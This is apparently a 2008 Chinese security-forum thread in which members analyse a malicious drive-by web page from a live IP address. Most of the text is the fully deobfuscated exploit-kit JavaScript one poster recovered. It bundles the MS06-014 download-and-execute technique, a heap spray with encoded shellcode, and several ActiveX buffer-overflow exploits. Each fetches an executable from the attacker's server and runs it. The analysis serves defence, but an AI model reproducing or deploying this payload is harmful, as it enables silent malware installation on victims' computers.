挂马，解不出来。。

dikex

http://79.135.181.138/cgi-bin/in.cgi?p=user2
这个地址有点奇怪，第一次打开是一个加密的页面，第二次打开则跳转到http://privacy-scanner.com/1/index.php?170

不是利用cookie，而且过一段时间又可以再次打开那个加密页面

jimmyleo

呵呵 我和刺猬更懒
事先有模板 到时直接复制粘贴

jimmyleo

多谢 这个imon让我很头痛啊～

solcroft

可恶
今天网速好慢

solcroft

兼容模式为freshow打开了
照样崩溃

dikex

经过四五此这样的解密终于看到曙光了！

function AgMzTHLN(len)
{
var chars = "abcdefghiklmnopqrstuvwxyz";
var string_length = len;
var randomstring = '';
for (var i=0; i<string_length; i++) {
  var rnum = Math.floor(Math.random() * chars.length);
  randomstring += chars.substring(rnum,rnum+1);
}
return randomstring;
}
function LYbEbNdn(CLSID, name) {
var r = null;
try { eval('r = CLSID.CreateObject(name)') }catch(e){}
if (! r) { try { eval('r = CLSID.CreateObject(name, "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.CreateObject(name, "", "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject("", name)') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject(name, "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject(name)') }catch(e){} }
return(r);
}
function MheErtQC(xml, url) {
try {
  xml.open("GET", url, false);
  xml.send(null);
} catch(e) { return 0; }
return xml.responseBody;
}
function e1GueMGv(o, name, data) {
try {
  o.Type = 1;
  o.Mode = 3;
  o.Open();
  o.Write(data);
  o.SaveToFile(name, 2);
  o.Close();
} catch(e) { return 0; }
return 1;
}
function fLrrULEd(url, msxml, adobd, shell, flg)
{
var retval = 0;
var data = MheErtQC(msxml, url);
if (data != 0) {
  var name = "c:\\win"+AgMzTHLN(4)+".exe";
  if (e1GueMGv(adobd, name, data) == 1) {
   if (flg == 0) {
    try {
     shell.Run(name, 0);
     retval = 1;
    } catch(e) { }
   } else {
    try {
     shell.ShellExecute(name, "", "", "open", 0);
     retval = 1;
    } catch(e) { }
   }
  }
}
return retval;
}
function Hbzzp3cv()
{
var MlyOewkA = new Array(null, null, null);
var KbQI7z_C = 0;
var GIyycPgl = 'http://79.135.181.138/cgi-bin/in.cgi?0501022602000000003a819343242c14651558d4ef';
var xvBv8obL = 1;
try {
  var kIPtJGvM = 0;
  var F47BCbnI = document.createElement("object");
  F47BCbnI.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
  if (F47BCbnI) {
   MlyOewkA[0] = LYbEbNdn(F47BCbnI, "msxml2.XMLHTTP");
   if (! MlyOewkA[0]) MlyOewkA[0] = LYbEbNdn(F47BCbnI, "Microsoft.XMLHTTP");
   if (! MlyOewkA[0]) MlyOewkA[0] = LYbEbNdn(F47BCbnI, "MSXML2.ServerXMLHTTP");
   MlyOewkA[1] = LYbEbNdn(F47BCbnI, "ADODB.Stream");
   MlyOewkA[2] = LYbEbNdn(F47BCbnI, "WScript.Shell");
   if (!MlyOewkA[2]) {
    MlyOewkA[2] = LYbEbNdn(F47BCbnI, "Shell.Application");
    if (MlyOewkA[2]) kIPtJGvM=1;
   }
  }
  if (MlyOewkA[0] && MlyOewkA[1] && MlyOewkA[2]) {
   for(var ueAGJzMZ=0;ueAGJzMZ<xvBv8obL;ueAGJzMZ++) {
    var YkLGyAyS = fLrrULEd(GIyycPgl+'0'+ueAGJzMZ.toString(), MlyOewkA[0], MlyOewkA[1], MlyOewkA[2], kIPtJGvM);
    if (!KbQI7z_C)
     KbQI7z_C = YkLGyAyS;
   }
  }
} catch(e) {}
return KbQI7z_C;
}
var gkmpOaTo = new Array();
var E7I2izyb = 0;
function Cfc5mdEs()
{
gkmpOaTo = gkmpOaTo;
setTimeout("Rk6jx8Mw()", 2000);
}
function cMJI2swV(szEsNEfd, T7C9L59q)
{
while (szEsNEfd.length*2<T7C9L59q)
  szEsNEfd += szEsNEfd;
szEsNEfd = szEsNEfd.substring(0,T7C9L59q/2);
return szEsNEfd;
}
function lCi66Wep()
{
if (!E7I2izyb) {
  var G4FHzuhO = 0x0c0c0c0c;
  var oVtm7oAt = unescape("%uf633%u09e9%u0001%u5f00%uc033%u0364%u3040%u0c78" +
"%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u408b%u8d34" +
"%u7c40%u688b%u8b3c%u6af7%u5903%u9ce8%u0000%ue200" +
"%u68f9%u6e6f%u0000%u7568%u6c72%u546d%u16ff%ue88b" +
"%u86e8%u0000%u6800%u3233%u0000%u7568%u6573%u5472" +
"%u16ff%ue88b%u026a%ue859%u006f%u0000%uf9e2%uec83" +
"%u8b20%uc7dc%u6303%u5c3a%uc769%u0443%u666e%u2e6f" +
"%u43c7%u6508%u6578%u6a00%u6a00%u5300%u6a57%uff00" +
"%u0c56%udc8b%u016a%uff53%u0856%u1a6a%u406a%u56ff" +
"%u8b04%uebe8%u5f0c%u006a%u6a57%u5500%u006a%u56ff" +
"%ue814%uffef%uffff%u8b55%u83ec%u0c7d%u750f%ube16" +
"%u0001%u0000%u5aeb%u8b5f%u83f7%u05c6%u006a%u458b" +
"%u5008%u56ff%u3310%u5dc0%u10c2%u5100%u8b56%u3c75" +
"%u748b%u782e%uf503%u8b56%u2076%uf503%uc933%u4149" +
"%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1%u030d" +
"%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66" +
"%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359" +
"%ufe83%u7400%ue805%uff9c%uffff%ue8e8%ufffe%u8eff" +
"%u0e4e%uecec%u0397%u980c%u8afe%u360e%u2f1a%u8370" +
"%u5d4f%u60c9%uc308%u68bf%u7474%u3a70%u2f2f%u3937" +
"%u312e%u3533%u312e%u3138%u312e%u3833%u632f%u6967" +
"%u622d%u6e69%u692f%u2e6e%u6763%u3f69%u3530%u3130" +
"%u3230%u3632%u3830%u3030%u3030%u3030%u3030%u6133" +
"%u3138%u3339%u3334%u3432%u6332%u3431%u3536%u3531" +
"%u3835%u3464%u6665%u6200");
  var XH5TU1hv = 0x400000;
  var ZxzTp4AB = oVtm7oAt.length * 2;
  var T7C9L59q = XH5TU1hv - (ZxzTp4AB+0x38);
  var szEsNEfd = unescape("%u0c0c%u0c0c");
  szEsNEfd = cMJI2swV(szEsNEfd,T7C9L59q);
  var ZcaPaC4W = (G4FHzuhO - 0x400000)/XH5TU1hv;

  for (i=0;i<ZcaPaC4W;i++) {
   gkmpOaTo = szEsNEfd + oVtm7oAt;
  }
  E7I2izyb = 1;
  Cfc5mdEs();
}
return 0;
}
function Ut6oudko(XngVIeqz)
{
try {
  var oyGH8tVH = new Date();
  oyGH8tVH.setDate(oyGH8tVH.getDate() + 1);
  document.cookie =
   "id=" + XngVIeqz +
   "; expires=" + oyGH8tVH.toGMTString() +
   "; path=/";
} catch(e) {}
}
function KskA4zlf() {
try {
  var q3oDUAlQ = new ActiveXObject('Sb.SuperBuddy');
  if (q3oDUAlQ) {
   Ut6oudko(9);
   q3oDUAlQ.LinkSBIcons(0x0c0c0c0c);
  }
} catch(e) {}

return 0;
}
function gGGJ5lFo()
{
try {
  var Ok0iGRQu = document.createElement("object");
  Ok0iGRQu.setAttribute("classid", "clsid:77829F14-D911-40FF-A2F0-D11DB8D6D0BC");
  var YQn_bRSC='';
  for(var CYwPVdzL=0;CYwPVdzL<4124;CYwPVdzL++)
   YQn_bRSC += "\x0c";

  Ut6oudko(3);
  Ok0iGRQu.SetFormatLikeSample(YQn_bRSC);
} catch(e) { }
}
function QQpcapeF()
{
try {
  var VYC2HCqR = new ActiveXObject("GomWebCtrl.GomManager.1");
  if (VYC2HCqR) {
   var cJrxNpUD='';
   var N04rJ6bg=510;
   for(var zm3vmdcf=0;zm3vmdcf<N04rJ6bg;zm3vmdcf++)
    cJrxNpUD += unescape("%0c");
   Ut6oudko(13);
   VYC2HCqR.OpenURL(cJrxNpUD);
  }
} catch(e) {}
return 0;
}

function roG6GMCR()
{
Ut6oudko(12);

for (var FT_Uz46R=0;FT_Uz46R<128;FT_Uz46R++)
{
  try{
   var pjRt1JXS = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
   pjRt1JXS.setSlice(0x7ffffffe, 0x0c0c0c0c, 0x0c0c0c0c, 0x0c0c0c0c);
  } catch(e){}
}

return 0;
}
if (Hbzzp3cv() || lCi66Wep() || KskA4zlf() || gGGJ5lFo() || QQpcapeF() || roG6GMCR()) { }

ms06-014的那个：
http://79.135.181.138/cgi-bin/in.cgi?0501022602000000003a819343242c14651558d4ef

shellcode的那个（据clsid，为NCTsoft NCTAudioFile2 ActiveX控件远程栈溢出漏洞）：
http://79.135.181.138/cgi-bin/in.cgi?0501022608000000003a819343242c14651558d4efb

[ 本帖最后由 dikex 于 2008-2-13 18:33 编辑 ]

tanlimo

其实我的方法更淫荡

dikex

看漏了一下，有好几个建立ActiveXObject的，算了，懒得深究
代码写得很好

jimmyleo

原帖由 dikex 于 2008-2-13 18:35 发表
看漏了一下，有好几个建立ActiveXObject的，算了，懒得深究
代码写得很好

嗯 还抛出异常...
粗略一看有很多国外的第三方...

jimmyleo

jotti上avira独报....